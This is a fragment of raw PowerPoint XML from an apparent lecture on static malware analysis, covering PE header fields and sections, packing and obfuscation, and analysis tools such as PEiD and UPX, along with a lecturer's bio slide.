                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Imports</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Functions from other lib. used by the malware</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Exports</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Functions in the malware called by others</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Time Date</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Stamp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Time complied</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Sections</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Names</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> of sections in the file and their sizes on the disk and memory</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Subsystem</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Indicates whether the program is</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> a command-line or GUI app.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Resource</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Strings,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> icons, menus and others included.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374920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5669"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2555777" y="1268760"/>
            <a:ext cx="4316226" cy="5466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960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 Headers and Sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2380462820"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="557924" y="1200014"/>
          <a:ext cx="8118532" cy="5469346"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1983939"/>
                <a:gridCol w="6134593"/>
              </a:tblGrid>
              <a:tr h="444261">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.text</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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dirty="0" smtClean="0"/>
                        <a:t>Contains program code</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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0180">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>rdata</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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dirty="0" smtClean="0"/>
                        <a:t>Holds</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>read-only</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="vi-VN" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> that is globally accessible within the program</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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4261">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.data</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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dirty="0" smtClean="0"/>
                        <a:t>Stores</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>global</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> data accessed throughout the program</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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85971">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>idata</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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dirty="0" smtClean="0"/>
                        <a:t>Sometimes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> presents and stores the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>import</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> function information; if this section is not present, the import function information is stored in the .</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>rdata</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> section.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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85971">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>edata</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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dirty="0" smtClean="0"/>
                        <a:t>Sometimes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> presents and stores the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>export</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> function information; if this section is not present, the export function information is stored in the .</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>rdata</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> section.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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0180">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>pdata</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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dirty="0" smtClean="0"/>
                        <a:t>Present only in 64-bit executables and stores </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>exception-handling</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>information.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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4261">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>rsrc</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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dirty="0" smtClean="0"/>
                        <a:t>Stores</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>resources</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> needed by the executable</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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4261">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>reloc</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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GB" dirty="0" smtClean="0"/>
                        <a:t>Contains information for </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>relocation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t> of library files</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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66227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Packing and Obfuscation Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Malware writer often use packing and obfuscation to make their files more difficult to detect or analyse.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>Obfuscated programs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: malware writer has attempted to hide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>Packed programs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: a subset of obfuscated programs in which the malicious program is compressed and unable to be analysed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611561" y="5266074"/>
            <a:ext cx="8136904" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
              <a:alpha val="49000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0"/>
              <a:t>Packed and obfuscated code will often include at least the functions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" i="1" dirty="0"/>
              <a:t>, which are used to load and gain access to additional functions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2167437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48" y="1124744"/>
            <a:ext cx="4139952" cy="3104964"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Bio</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1196752"/>
            <a:ext cx="8784976" cy="5544616"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="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3915054"/>
            <a:ext cx="3923928" cy="2942946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="36237" y="1152281"/>
            <a:ext cx="4967811" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Hometown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: multiple towns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>Degree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Ph.D (2014)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Northumbria Unniversity, Newcatle Upon Tyne, UK.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Major: Computer Networks and Communications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Thesis title: “An Mobility State Adaptive Routing Protocol for Mobile Ad Hoc Netwoks”. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355976" y="4638035"/>
            <a:ext cx="4752528" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Research Interests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Mobile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Ad Hoc and Sensor Networks, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>QoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> Routing, Network Security, Visible Light Communications (VLC), Chaos theory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Institute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Korea – Vietnam Friendship IT College</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3056419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Packing and Obfuscation Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Packing Files</a:t>
            </a:r>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820551"/>
            <a:ext cx="7481478" cy="4200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3779912" y="2060848"/>
            <a:ext cx="1296144" cy="1859767"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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752010" y="5157192"/>
            <a:ext cx="1468062" cy="144016"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381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088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Packing and Obfuscation Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Once a program is packed, it must be unpacked  before performing an analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Detecting packer: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>PEiD</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Packing/Unpacking: UPX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Examining header: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
